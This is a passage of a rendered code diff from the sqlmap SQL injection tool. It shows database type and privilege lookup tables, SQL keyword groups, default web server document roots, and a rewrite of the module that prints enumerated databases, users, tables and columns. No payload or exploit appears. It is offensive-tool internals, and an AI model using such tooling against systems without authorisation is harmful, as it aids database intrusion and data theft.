|
}
|
||||||
|
|
||||||
|
SYBASE_TYPES = {
|
||||||
|
14: "floatn",
|
||||||
|
8: "float",
|
||||||
|
15: "datetimn",
|
||||||
|
12: "datetime",
|
||||||
|
23: "real",
|
||||||
|
28: "numericn",
|
||||||
|
10: "numeric",
|
||||||
|
27: "decimaln",
|
||||||
|
26: "decimal",
|
||||||
|
17: "moneyn",
|
||||||
|
11: "money",
|
||||||
|
21: "smallmoney",
|
||||||
|
22: "smalldatetime",
|
||||||
|
13: "intn",
|
||||||
|
7: "int",
|
||||||
|
6: "smallint",
|
||||||
|
5: "tinyint",
|
||||||
|
16: "bit",
|
||||||
|
2: "varchar",
|
||||||
|
18: "sysname",
|
||||||
|
25: "nvarchar",
|
||||||
|
1: "char",
|
||||||
|
24: "nchar",
|
||||||
|
4: "varbinary",
|
||||||
|
80: "timestamp",
|
||||||
|
3: "binary",
|
||||||
|
19: "text",
|
||||||
|
20: "image",
|
||||||
|
}
|
||||||
|
|
||||||
|
MYSQL_PRIVS = {
|
||||||
|
1: "select_priv",
|
||||||
|
2: "insert_priv",
|
||||||
|
3: "update_priv",
|
||||||
|
4: "delete_priv",
|
||||||
|
5: "create_priv",
|
||||||
|
6: "drop_priv",
|
||||||
|
7: "reload_priv",
|
||||||
|
8: "shutdown_priv",
|
||||||
|
9: "process_priv",
|
||||||
|
10: "file_priv",
|
||||||
|
11: "grant_priv",
|
||||||
|
12: "references_priv",
|
||||||
|
13: "index_priv",
|
||||||
|
14: "alter_priv",
|
||||||
|
15: "show_db_priv",
|
||||||
|
16: "super_priv",
|
||||||
|
17: "create_tmp_table_priv",
|
||||||
|
18: "lock_tables_priv",
|
||||||
|
19: "execute_priv",
|
||||||
|
20: "repl_slave_priv",
|
||||||
|
21: "repl_client_priv",
|
||||||
|
22: "create_view_priv",
|
||||||
|
23: "show_view_priv",
|
||||||
|
24: "create_routine_priv",
|
||||||
|
25: "alter_routine_priv",
|
||||||
|
26: "create_user_priv",
|
||||||
|
}
|
||||||
|
|
||||||
|
PGSQL_PRIVS = {
|
||||||
|
1: "createdb",
|
||||||
|
2: "super",
|
||||||
|
3: "catupd",
|
||||||
|
}
|
||||||
|
|
||||||
|
# Reference(s): http://stackoverflow.com/a/17672504
|
||||||
|
# http://docwiki.embarcadero.com/InterBase/XE7/en/RDB$USER_PRIVILEGES
|
||||||
|
|
||||||
|
FIREBIRD_PRIVS = {
|
||||||
|
"S": "SELECT",
|
||||||
|
"I": "INSERT",
|
||||||
|
"U": "UPDATE",
|
||||||
|
"D": "DELETE",
|
||||||
|
"R": "REFERENCE",
|
||||||
|
"E": "EXECUTE",
|
||||||
|
"X": "EXECUTE",
|
||||||
|
"A": "ALL",
|
||||||
|
"M": "MEMBER",
|
||||||
|
"T": "DECRYPT",
|
||||||
|
"E": "ENCRYPT",
|
||||||
|
"B": "SUBSCRIBE",
|
||||||
|
}
|
||||||
|
|
||||||
|
DB2_PRIVS = {
|
||||||
|
1: "CONTROLAUTH",
|
||||||
|
2: "ALTERAUTH",
|
||||||
|
3: "DELETEAUTH",
|
||||||
|
4: "INDEXAUTH",
|
||||||
|
5: "INSERTAUTH",
|
||||||
|
6: "REFAUTH",
|
||||||
|
7: "SELECTAUTH",
|
||||||
|
8: "UPDATEAUTH",
|
||||||
|
}
|
||||||
|
|
||||||
|
DUMP_REPLACEMENTS = {" ": NULL, "": BLANK}
|
||||||
|
|
||||||
|
DBMS_DICT = {
|
||||||
|
DBMS.MSSQL: (MSSQL_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/", "mssql+pymssql"),
|
||||||
|
DBMS.MYSQL: (MYSQL_ALIASES, "python pymysql", "https://github.com/petehunt/PyMySQL/", "mysql"),
|
||||||
|
DBMS.PGSQL: (PGSQL_ALIASES, "python-psycopg2", "http://initd.org/psycopg/", "postgresql"),
|
||||||
|
DBMS.ORACLE: (ORACLE_ALIASES, "python cx_Oracle", "http://cx-oracle.sourceforge.net/", "oracle"),
|
||||||
|
DBMS.SQLITE: (SQLITE_ALIASES, "python-sqlite", "http://packages.ubuntu.com/quantal/python-sqlite", "sqlite"),
|
||||||
|
DBMS.ACCESS: (ACCESS_ALIASES, "python-pyodbc", "http://pyodbc.googlecode.com/", "access"),
|
||||||
|
DBMS.FIREBIRD: (FIREBIRD_ALIASES, "python-kinterbasdb", "http://kinterbasdb.sourceforge.net/", "firebird"),
|
||||||
|
DBMS.MAXDB: (MAXDB_ALIASES, None, None, "maxdb"),
|
||||||
|
DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/", "sybase"),
|
||||||
|
DBMS.DB2: (DB2_ALIASES, "python ibm-db", "http://code.google.com/p/ibm-db/", "ibm_db_sa"),
|
||||||
|
DBMS.HSQLDB: (HSQLDB_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/", None),
|
||||||
|
}
|
||||||
|
|
||||||
|
FROM_DUMMY_TABLE = {
|
||||||
|
DBMS.ORACLE: " FROM DUAL",
|
||||||
|
DBMS.ACCESS: " FROM MSysAccessObjects",
|
||||||
|
DBMS.FIREBIRD: " FROM RDB$DATABASE",
|
||||||
|
DBMS.MAXDB: " FROM VERSIONS",
|
||||||
|
DBMS.DB2: " FROM SYSIBM.SYSDUMMY1",
|
||||||
|
DBMS.HSQLDB: " FROM INFORMATION_SCHEMA.SYSTEM_USERS"
|
||||||
|
}
|
||||||
|
|
||||||
|
SQL_STATEMENTS = {
|
||||||
|
"SQL SELECT statement": (
|
||||||
|
"select ",
|
||||||
|
"show ",
|
||||||
|
" top ",
|
||||||
|
" distinct ",
|
||||||
|
" from ",
|
||||||
|
" from dual",
|
||||||
|
" where ",
|
||||||
|
" group by ",
|
||||||
|
" order by ",
|
||||||
|
" having ",
|
||||||
|
" limit ",
|
||||||
|
" offset ",
|
||||||
|
" union all ",
|
||||||
|
" rownum as ",
|
||||||
|
"(case ", ),
|
||||||
|
|
||||||
|
"SQL data definition": (
|
||||||
|
"create ",
|
||||||
|
"declare ",
|
||||||
|
"drop ",
|
||||||
|
"truncate ",
|
||||||
|
"alter ", ),
|
||||||
|
|
||||||
|
"SQL data manipulation": (
|
||||||
|
"bulk ",
|
||||||
|
"insert ",
|
||||||
|
"update ",
|
||||||
|
"delete ",
|
||||||
|
"merge ",
|
||||||
|
"load ", ),
|
||||||
|
|
||||||
|
"SQL data control": (
|
||||||
|
"grant ",
|
||||||
|
"revoke ", ),
|
||||||
|
|
||||||
|
"SQL data execution": (
|
||||||
|
"exec ",
|
||||||
|
"execute ",
|
||||||
|
"values ",
|
||||||
|
"call ", ),
|
||||||
|
|
||||||
|
"SQL transaction": (
|
||||||
|
"start transaction ",
|
||||||
|
"begin work ",
|
||||||
|
"begin transaction ",
|
||||||
|
"commit ",
|
||||||
|
"rollback ", ),
|
||||||
|
}
|
||||||
|
|
||||||
|
POST_HINT_CONTENT_TYPES = {
|
||||||
|
POST_HINT.JSON: "application/json",
|
||||||
|
POST_HINT.JSON_LIKE: "application/json",
|
||||||
|
POST_HINT.MULTIPART: "multipart/form-data",
|
||||||
|
POST_HINT.SOAP: "application/soap+xml",
|
||||||
|
POST_HINT.XML: "application/xml",
|
||||||
|
POST_HINT.ARRAY_LIKE: "application/x-www-form-urlencoded; charset=utf-8",
|
||||||
|
}
|
||||||
|
|
||||||
|
DEPRECATED_OPTIONS = {
|
||||||
|
"--replicate": "use '--dump-format=SQLITE' instead",
|
||||||
|
"--no-unescape": "use '--no-escape' instead",
|
||||||
|
"--binary": "use '--binary-fields' instead",
|
||||||
|
"--auth-private": "use '--auth-file' instead",
|
||||||
|
"--check-payload": None,
|
||||||
|
"--check-waf": None,
|
||||||
|
}
|
||||||
|
|
||||||
|
DUMP_DATA_PREPROCESS = {
|
||||||
|
DBMS.ORACLE: {"XMLTYPE": "(%s).getStringVal()"}, # Reference: https://www.tibcommunity.com/docs/DOC-3643
|
||||||
|
DBMS.MSSQL: {"IMAGE": "CONVERT(VARBINARY(MAX),%s)"},
|
||||||
|
}
|
||||||
|
|
||||||
|
DEFAULT_DOC_ROOTS = {
|
||||||
|
OS.WINDOWS: ("C:/xampp/htdocs/", "C:/wamp/www/", "C:/Inetpub/wwwroot/"),
|
||||||
|
OS.LINUX: ("/var/www/", "/var/www/html", "/usr/local/apache2/htdocs", "/var/www/nginx-default", "/srv/www") # Reference: https://wiki.apache.org/httpd/DistrosDefaultLayout
|
||||||
|
}
|
||||||
667
lib/core/dump.py
667
lib/core/dump.py
@@ -1,173 +1,272 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
$Id$
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
|
|
||||||
|
|
||||||
Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
|
|
||||||
and Daniele Bellucci <daniele.bellucci@gmail.com>
|
|
||||||
|
|
||||||
sqlmap is free software; you can redistribute it and/or modify it under
|
|
||||||
the terms of the GNU General Public License as published by the Free
|
|
||||||
Software Foundation version 2 of the License.
|
|
||||||
|
|
||||||
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
|
|
||||||
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
|
|
||||||
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
|
|
||||||
details.
|
|
||||||
|
|
||||||
You should have received a copy of the GNU General Public License along
|
|
||||||
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
|
|
||||||
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
import cgi
|
||||||
|
import hashlib
|
||||||
import re
|
|
||||||
import os
|
import os
|
||||||
|
import re
|
||||||
|
import tempfile
|
||||||
|
import threading
|
||||||
|
|
||||||
|
from lib.core.common import Backend
|
||||||
|
from lib.core.common import checkFile
|
||||||
from lib.core.common import dataToDumpFile
|
from lib.core.common import dataToDumpFile
|
||||||
from lib.core.common import filePathToString
|
from lib.core.common import dataToStdout
|
||||||
|
from lib.core.common import getSafeExString
|
||||||
|
from lib.core.common import getUnicode
|
||||||
|
from lib.core.common import isListLike
|
||||||
|
from lib.core.common import normalizeUnicode
|
||||||
|
from lib.core.common import openFile
|
||||||
|
from lib.core.common import prioritySortColumns
|
||||||
|
from lib.core.common import randomInt
|
||||||
|
from lib.core.common import safeCSValue
|
||||||
|
from lib.core.common import unicodeencode
|
||||||
|
from lib.core.common import unsafeSQLIdentificatorNaming
|
||||||
from lib.core.data import conf
|
from lib.core.data import conf
|
||||||
|
from lib.core.data import kb
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
|
from lib.core.dicts import DUMP_REPLACEMENTS
|
||||||
|
from lib.core.enums import CONTENT_STATUS
|
||||||
|
from lib.core.enums import CONTENT_TYPE
|
||||||
|
from lib.core.enums import DBMS
|
||||||
|
from lib.core.enums import DUMP_FORMAT
|
||||||
|
from lib.core.exception import SqlmapGenericException
|
||||||
|
from lib.core.exception import SqlmapValueException
|
||||||
|
from lib.core.exception import SqlmapSystemException
|
||||||
|
from lib.core.replication import Replication
|
||||||
|
from lib.core.settings import DUMP_FILE_BUFFER_SIZE
|
||||||
|
from lib.core.settings import HTML_DUMP_CSS_STYLE
|
||||||
|
from lib.core.settings import IS_WIN
|
||||||
|
from lib.core.settings import METADB_SUFFIX
|
||||||
|
from lib.core.settings import MIN_BINARY_DISK_DUMP_SIZE
|
||||||
|
from lib.core.settings import TRIM_STDOUT_DUMP_SIZE
|
||||||
|
from lib.core.settings import UNICODE_ENCODING
|
||||||
|
from lib.core.settings import WINDOWS_RESERVED_NAMES
|
||||||
|
from thirdparty.magic import magic
|
||||||
|
|
||||||
|
from extra.safe2bin.safe2bin import safechardecode
|
||||||
|
|
||||||
class Dump:
|
class Dump(object):
|
||||||
"""
|
"""
|
||||||
This class defines methods used to parse and output the results
|
This class defines methods used to parse and output the results
|
||||||
of SQL injection actions
|
of SQL injection actions
|
||||||
|
|
||||||
"""
|
"""
|
||||||
|
|
||||||
def __init__(self):
|
def __init__(self):
|
||||||
self.__outputFile = None
|
self._outputFile = None
|
||||||
self.__outputFP = None
|
self._outputFP = None
|
||||||
|
self._lock = threading.Lock()
|
||||||
|
|
||||||
def __write(self, data, n=True, rFile=False):
|
|
||||||
if n:
|
|
||||||
print data
|
|
||||||
self.__outputFP.write("%s\n" % data)
|
|
||||||
|
|
||||||
# TODO: do not duplicate queries output in the text file, check
|
|
||||||
# before if the data is already within the text file content
|
|
||||||
if rFile and conf.rFile:
|
|
||||||
rFile = filePathToString(conf.rFile)
|
|
||||||
rFileFP = open("%s%s%s" % (conf.filePath, os.sep, rFile), "w")
|
|
||||||
rFileFP.write(data)
|
|
||||||
rFileFP.close()
|
|
||||||
else:
|
|
||||||
print data,
|
|
||||||
self.__outputFP.write("%s " % data)
|
|
||||||
|
|
||||||
self.__outputFP.flush()
|
|
||||||
|
|
||||||
conf.loggedToOut = True
|
|
||||||
|
|
||||||
|
|
||||||
def setOutputFile(self):
|
|
||||||
self.__outputFile = "%s%slog" % (conf.outputPath, os.sep)
|
|
||||||
self.__outputFP = open(self.__outputFile, "a")
|
|
||||||
|
|
||||||
|
|
||||||
def string(self, header, data):
|
|
||||||
if isinstance(data, (list, tuple, set)):
|
|
||||||
self.lister(header, data)
|
|
||||||
|
|
||||||
|
def _write(self, data, newline=True, console=True, content_type=None):
|
||||||
|
if hasattr(conf, "api"):
|
||||||
|
dataToStdout(data, content_type=content_type, status=CONTENT_STATUS.COMPLETE)
|
||||||
return
|
return
|
||||||
|
|
||||||
if data:
|
text = "%s%s" % (data, "\n" if newline else " ")
|
||||||
data = data.replace("__NEWLINE__", "\n").replace("__TAB__", "\t")
|
|
||||||
data = data.replace("__START__", "").replace("__STOP__", "")
|
|
||||||
data = data.replace("__DEL__", ", ")
|
|
||||||
|
|
||||||
if "\n" in data:
|
if console:
|
||||||
self.__write("%s:\n---\n%s---\n" % (header, data), rFile=header)
|
dataToStdout(text)
|
||||||
|
|
||||||
|
if kb.get("multiThreadMode"):
|
||||||
|
self._lock.acquire()
|
||||||
|
|
||||||
|
try:
|
||||||
|
self._outputFP.write(text)
|
||||||
|
except IOError, ex:
|
||||||
|
errMsg = "error occurred while writing to log file ('%s')" % getSafeExString(ex)
|
||||||
|
raise SqlmapGenericException(errMsg)
|
||||||
|
|
||||||
|
if kb.get("multiThreadMode"):
|
||||||
|
self._lock.release()
|
||||||
|
|
||||||
|
kb.dataOutputFlag = True
|
||||||
|
|
||||||
|
def flush(self):
|
||||||
|
if self._outputFP:
|
||||||
|
try:
|
||||||
|
self._outputFP.flush()
|
||||||
|
except IOError:
|
||||||
|
pass
|
||||||
|
|
||||||
|
def setOutputFile(self):
|
||||||
|
self._outputFile = os.path.join(conf.outputPath, "log")
|
||||||
|
try:
|
||||||
|
self._outputFP = openFile(self._outputFile, "ab" if not conf.flushSession else "wb")
|
||||||
|
except IOError, ex:
|
||||||
|
errMsg = "error occurred while opening log file ('%s')" % getSafeExString(ex)
|
||||||
|
raise SqlmapGenericException(errMsg)
|
||||||
|
|
||||||
|
def getOutputFile(self):
|
||||||
|
return self._outputFile
|
||||||
|
|
||||||
|
def singleString(self, data, content_type=None):
|
||||||
|
self._write(data, content_type=content_type)
|
||||||
|
|
||||||
|
def string(self, header, data, content_type=None, sort=True):
|
||||||
|
kb.stickyLevel = None
|
||||||
|
|
||||||
|
if hasattr(conf, "api"):
|
||||||
|
self._write(data, content_type=content_type)
|
||||||
|
return
|
||||||
|
|
||||||
|
if isListLike(data):
|
||||||
|
self.lister(header, data, content_type, sort)
|
||||||
|
elif data is not None:
|
||||||
|
_ = getUnicode(data)
|
||||||
|
|
||||||
|
if _ and _[-1] == '\n':
|
||||||
|
_ = _[:-1]
|
||||||
|
|
||||||
|
if "\n" in _:
|
||||||
|
self._write("%s:\n---\n%s\n---" % (header, _))
|
||||||
else:
|
else:
|
||||||
self.__write("%s: '%s'\n" % (header, data))
|
self._write("%s: %s" % (header, ("'%s'" % _) if isinstance(data, basestring) else _))
|
||||||
else:
|
else:
|
||||||
self.__write("%s:\tNone\n" % header)
|
self._write("%s:\tNone" % header)
|
||||||
|
|
||||||
|
|
||||||
def lister(self, header, elements):
|
|
||||||
if elements:
|
|
||||||
self.__write("%s [%d]:" % (header, len(elements)))
|
|
||||||
|
|
||||||
|
def lister(self, header, elements, content_type=None, sort=True):
|
||||||
|
if elements and sort:
|
||||||
try:
|
try:
|
||||||
elements = set(elements)
|
elements = set(elements)
|
||||||
elements = list(elements)
|
elements = list(elements)
|
||||||
elements.sort(key=lambda x: x.lower())
|
elements.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x)
|
||||||
except:
|
except:
|
||||||
pass
|
pass
|
||||||
|
|
||||||
for element in elements:
|
if hasattr(conf, "api"):
|
||||||
if isinstance(element, str):
|
self._write(elements, content_type=content_type)
|
||||||
self.__write("[*] %s" % element)
|
return
|
||||||
elif isinstance(element, (list, tuple, set)):
|
|
||||||
self.__write("[*] " + ", ".join(e for e in element))
|
|
||||||
|
|
||||||
if elements:
|
if elements:
|
||||||
self.__write("")
|
self._write("%s [%d]:" % (header, len(elements)))
|
||||||
|
|
||||||
|
for element in elements:
|
||||||
|
if isinstance(element, basestring):
|
||||||
|
self._write("[*] %s" % element)
|
||||||
|
elif isListLike(element):
|
||||||
|
self._write("[*] " + ", ".join(getUnicode(e) for e in element))
|
||||||
|
|
||||||
def userSettings(self, header, userSettings, subHeader):
|
if elements:
|
||||||
self.__areAdmins = set()
|
self._write("")
|
||||||
|
|
||||||
if userSettings:
|
def banner(self, data):
|
||||||
self.__write("%s:" % header)
|
self.string("banner", data, content_type=CONTENT_TYPE.BANNER)
|
||||||
|
|
||||||
|
def currentUser(self, data):
|
||||||
|
self.string("current user", data, content_type=CONTENT_TYPE.CURRENT_USER)
|
||||||
|
|
||||||
|
def currentDb(self, data):
|
||||||
|
if Backend.isDbms(DBMS.MAXDB):
|
||||||
|
self.string("current database (no practical usage on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB)
|
||||||
|
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.PGSQL, DBMS.HSQLDB):
|
||||||
|
self.string("current schema (equivalent to database on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB)
|
||||||
|
else:
|
||||||
|
self.string("current database", data, content_type=CONTENT_TYPE.CURRENT_DB)
|
||||||
|
|
||||||
|
def hostname(self, data):
|
||||||
|
self.string("hostname", data, content_type=CONTENT_TYPE.HOSTNAME)
|
||||||
|
|
||||||
|
def dba(self, data):
|
||||||
|
self.string("current user is DBA", data, content_type=CONTENT_TYPE.IS_DBA)
|
||||||
|
|
||||||
|
def users(self, users):
|
||||||
|
self.lister("database management system users", users, content_type=CONTENT_TYPE.USERS)
|
||||||
|
|
||||||
|
def userSettings(self, header, userSettings, subHeader, content_type=None):
|
||||||
|
self._areAdmins = set()
|
||||||
|
|
||||||
if isinstance(userSettings, (tuple, list, set)):
|
if isinstance(userSettings, (tuple, list, set)):
|
||||||
self.__areAdmins = userSettings[1]
|
self._areAdmins = userSettings[1]
|
||||||
userSettings = userSettings[0]
|
userSettings = userSettings[0]
|
||||||
|
|
||||||
users = userSettings.keys()
|
users = userSettings.keys()
|
||||||
users.sort(key=lambda x: x.lower())
|
users.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x)
|
||||||
|
|
||||||
|
if hasattr(conf, "api"):
|
||||||
|
self._write(userSettings, content_type=content_type)
|
||||||
|
return
|
||||||
|
|
||||||
|
if userSettings:
|
||||||
|
self._write("%s:" % header)
|
||||||
|
|
||||||
for user in users:
|
for user in users:
|
||||||
settings = userSettings[user]
|
settings = userSettings[user]
|
||||||
|
|
||||||
if user in self.__areAdmins:
|
if settings is None:
|
||||||
self.__write("[*] %s (administrator) [%d]:" % (user, len(settings)))
|
stringSettings = ""
|
||||||
else:
|
else:
|
||||||
self.__write("[*] %s [%d]:" % (user, len(settings)))
|
stringSettings = " [%d]:" % len(settings)
|
||||||
|
|
||||||
|
if user in self._areAdmins:
|
||||||
|
self._write("[*] %s (administrator)%s" % (user, stringSettings))
|
||||||
|
else:
|
||||||
|
self._write("[*] %s%s" % (user, stringSettings))
|
||||||
|
|
||||||
|
if settings:
|
||||||
settings.sort()
|
settings.sort()
|
||||||
|
|
||||||
for setting in settings:
|
for setting in settings:
|
||||||
self.__write(" %s: %s" % (subHeader, setting))
|
self._write(" %s: %s" % (subHeader, setting))
|
||||||
print
|
|
||||||
|
|
||||||
|
if userSettings:
|
||||||
|
self.singleString("")
|
||||||
|
|
||||||
|
def dbs(self, dbs):
|
||||||
|
self.lister("available databases", dbs, content_type=CONTENT_TYPE.DBS)
|
||||||
|
|
||||||
def dbTables(self, dbTables):
|
def dbTables(self, dbTables):
|
||||||
|
if isinstance(dbTables, dict) and len(dbTables) > 0:
|
||||||
|
if hasattr(conf, "api"):
|
||||||
|
self._write(dbTables, content_type=CONTENT_TYPE.TABLES)
|
||||||
|
return
|
||||||
|
|
||||||
maxlength = 0
|
maxlength = 0
|
||||||
|
|
||||||
for tables in dbTables.values():
|
for tables in dbTables.values():
|
||||||
for table in tables:
|
for table in tables:
|
||||||
maxlength = max(maxlength, len(table))
|
if table and isListLike(table):
|
||||||
|
table = table[0]
|
||||||
|
|
||||||
|
maxlength = max(maxlength, len(unsafeSQLIdentificatorNaming(normalizeUnicode(table) or unicode(table))))
|
||||||
|
|
||||||
lines = "-" * (int(maxlength) + 2)
|
lines = "-" * (int(maxlength) + 2)
|
||||||
|
|
||||||
for db, tables in dbTables.items():
|
for db, tables in dbTables.items():
|
||||||
tables.sort(key=lambda x: x.lower())
|
tables.sort()
|
||||||
|
|
||||||
self.__write("Database: %s" % db)
|
self._write("Database: %s" % unsafeSQLIdentificatorNaming(db) if db else "Current database")
|
||||||
|
|
||||||
if len(tables) == 1:
|
if len(tables) == 1:
|
||||||
self.__write("[1 table]")
|
self._write("[1 table]")
|
||||||
else:
|
else:
|
||||||
self.__write("[%d tables]" % len(tables))
|
self._write("[%d tables]" % len(tables))
|
||||||
|
|
||||||
self.__write("+%s+" % lines)
|
self._write("+%s+" % lines)
|
||||||
|
|
||||||
for table in tables:
|
for table in tables:
|
||||||
blank = " " * (maxlength - len(table))
|
if table and isListLike(table):
|
||||||
self.__write("| %s%s |" % (table, blank))
|
table = table[0]
|
||||||
|
|
||||||
self.__write("+%s+\n" % lines)
|
table = unsafeSQLIdentificatorNaming(table)
|
||||||
|
blank = " " * (maxlength - len(normalizeUnicode(table) or unicode(table)))
|
||||||
|
self._write("| %s%s |" % (table, blank))
|
||||||
|
|
||||||
|
self._write("+%s+\n" % lines)
|
||||||
|
elif dbTables is None or len(dbTables) == 0:
|
||||||
|
self.singleString("No tables found", content_type=CONTENT_TYPE.TABLES)
|
||||||
|
else:
|
||||||
|
self.string("tables", dbTables, content_type=CONTENT_TYPE.TABLES)
|
||||||
|
|
||||||
|
def dbTableColumns(self, tableColumns, content_type=None):
|
||||||
|
if isinstance(tableColumns, dict) and len(tableColumns) > 0:
|
||||||
|
if hasattr(conf, "api"):
|
||||||
|
self._write(tableColumns, content_type=content_type)
|
||||||
|
return
|
||||||
|
|
||||||
def dbTableColumns(self, tableColumns):
|
|
||||||
for db, tables in tableColumns.items():
|
for db, tables in tableColumns.items():
|
||||||
if not db:
|
if not db:
|
||||||
db = "All"
|
db = "All"
|
||||||
@@ -176,65 +275,194 @@ class Dump:
|
|||||||
maxlength1 = 0
|
maxlength1 = 0
|
||||||
maxlength2 = 0
|
maxlength2 = 0
|
||||||
|
|
||||||
|
colType = None
|
||||||
|
|
||||||
colList = columns.keys()
|
colList = columns.keys()
|
||||||
colList.sort(key=lambda x: x.lower())
|
colList.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x)
|
||||||
|
|
||||||
for column in colList:
|
for column in colList:
|
||||||
colType = columns[column]
|
colType = columns[column]
|
||||||
maxlength1 = max(maxlength1, len(column))
|
|
||||||
maxlength2 = max(maxlength2, len(colType))
|
column = unsafeSQLIdentificatorNaming(column)
|
||||||
|
maxlength1 = max(maxlength1, len(column or ""))
|
||||||
|
maxlength2 = max(maxlength2, len(colType or ""))
|
||||||
|
|
||||||
maxlength1 = max(maxlength1, len("COLUMN"))
|
maxlength1 = max(maxlength1, len("COLUMN"))
|
||||||
maxlength2 = max(maxlength2, len("TYPE"))
|
lines1 = "-" * (maxlength1 + 2)
|
||||||
lines1 = "-" * (int(maxlength1) + 2)
|
|
||||||
lines2 = "-" * (int(maxlength2) + 2)
|
|
||||||
|
|
||||||
self.__write("Database: %s\nTable: %s" % (db, table))
|
if colType is not None:
|
||||||
|
maxlength2 = max(maxlength2, len("TYPE"))
|
||||||
|
lines2 = "-" * (maxlength2 + 2)
|
||||||
|
|
||||||
|
self._write("Database: %s\nTable: %s" % (unsafeSQLIdentificatorNaming(db) if db else "Current database", unsafeSQLIdentificatorNaming(table)))
|
||||||
|
|
||||||
if len(columns) == 1:
|
if len(columns) == 1:
|
||||||
self.__write("[1 column]")
|
self._write("[1 column]")
|
||||||
else:
|
else:
|
||||||
self.__write("[%d columns]" % len(columns))
|
self._write("[%d columns]" % len(columns))
|
||||||
|
|
||||||
self.__write("+%s+%s+" % (lines1, lines2))
|
if colType is not None:
|
||||||
|
self._write("+%s+%s+" % (lines1, lines2))
|
||||||
|
else:
|
||||||
|
self._write("+%s+" % lines1)
|
||||||
|
|
||||||
blank1 = " " * (maxlength1 - len("COLUMN"))
|
blank1 = " " * (maxlength1 - len("COLUMN"))
|
||||||
|
|
||||||
|
if colType is not None:
|
||||||
blank2 = " " * (maxlength2 - len("TYPE"))
|
blank2 = " " * (maxlength2 - len("TYPE"))
|
||||||
|
|
||||||
self.__write("| Column%s | Type%s |" % (blank1, blank2))
|
if colType is not None:
|
||||||
self.__write("+%s+%s+" % (lines1, lines2))
|
self._write("| Column%s | Type%s |" % (blank1, blank2))
|
||||||
|
self._write("+%s+%s+" % (lines1, lines2))
|
||||||
|
else:
|
||||||
|
self._write("| Column%s |" % blank1)
|
||||||
|
self._write("+%s+" % lines1)
|
||||||
|
|
||||||
for column in colList:
|
for column in colList:
|
||||||
colType = columns[column]
|
colType = columns[column]
|
||||||
|
|
||||||
|
column = unsafeSQLIdentificatorNaming(column)
|
||||||
blank1 = " " * (maxlength1 - len(column))
|
blank1 = " " * (maxlength1 - len(column))
|
||||||
|
|
||||||
|
if colType is not None:
|
||||||
blank2 = " " * (maxlength2 - len(colType))
|
blank2 = " " * (maxlength2 - len(colType))
|
||||||
self.__write("| %s%s | %s%s |" % (column, blank1, colType, blank2))
|
self._write("| %s%s | %s%s |" % (column, blank1, colType, blank2))
|
||||||
|
else:
|
||||||
|
self._write("| %s%s |" % (column, blank1))
|
||||||
|
|
||||||
self.__write("+%s+%s+\n" % (lines1, lines2))
|
if colType is not None:
|
||||||
|
self._write("+%s+%s+\n" % (lines1, lines2))
|
||||||
|
else:
|
||||||
|
self._write("+%s+\n" % lines1)
|
||||||
|
|
||||||
|
def dbTablesCount(self, dbTables):
|
||||||
|
if isinstance(dbTables, dict) and len(dbTables) > 0:
|
||||||
|
if hasattr(conf, "api"):
|
||||||
|
self._write(dbTables, content_type=CONTENT_TYPE.COUNT)
|
||||||
|
return
|
||||||
|
|
||||||
|
maxlength1 = len("Table")
|
||||||
|
maxlength2 = len("Entries")
|
||||||
|
|
||||||
|
for ctables in dbTables.values():
|
||||||
|
for tables in ctables.values():
|
||||||
|
for table in tables:
|
||||||
|
maxlength1 = max(maxlength1, len(normalizeUnicode(table) or unicode(table)))
|
||||||
|
|
||||||
|
for db, counts in dbTables.items():
|
||||||
|
self._write("Database: %s" % unsafeSQLIdentificatorNaming(db) if db else "Current database")
|
||||||
|
|
||||||
|
lines1 = "-" * (maxlength1 + 2)
|
||||||
|
blank1 = " " * (maxlength1 - len("Table"))
|
||||||
|
lines2 = "-" * (maxlength2 + 2)
|
||||||
|
blank2 = " " * (maxlength2 - len("Entries"))
|
||||||
|
|
||||||
|
self._write("+%s+%s+" % (lines1, lines2))
|
||||||
|
self._write("| Table%s | Entries%s |" % (blank1, blank2))
|
||||||
|
self._write("+%s+%s+" % (lines1, lines2))
|
||||||
|
|
||||||
|
sortedCounts = counts.keys()
|
||||||
|
sortedCounts.sort(reverse=True)
|
||||||
|
|
||||||
|
for count in sortedCounts:
|
||||||
|
tables = counts[count]
|
||||||
|
|
||||||
|
if count is None:
|
||||||
|
count = "Unknown"
|
||||||
|
|
||||||
|
tables.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x)
|
||||||
|
|
||||||
|
for table in tables:
|
||||||
|
blank1 = " " * (maxlength1 - len(normalizeUnicode(table) or unicode(table)))
|
||||||
|
blank2 = " " * (maxlength2 - len(str(count)))
|
||||||
|
self._write("| %s%s | %d%s |" % (table, blank1, count, blank2))
|
||||||
|
|
||||||
|
self._write("+%s+%s+\n" % (lines1, lines2))
|
||||||
|
else:
|
||||||
|
logger.error("unable to retrieve the number of entries for any table")
|
||||||
|
|
||||||
def dbTableValues(self, tableValues):
|
def dbTableValues(self, tableValues):
|
||||||
|
replication = None
|
||||||
|
rtable = None
|
||||||
|
dumpFP = None
|
||||||
|
appendToFile = False
|
||||||
|
warnFile = False
|
||||||
|
|
||||||
|
if tableValues is None:
|
||||||
|
return
|
||||||
|
|
||||||
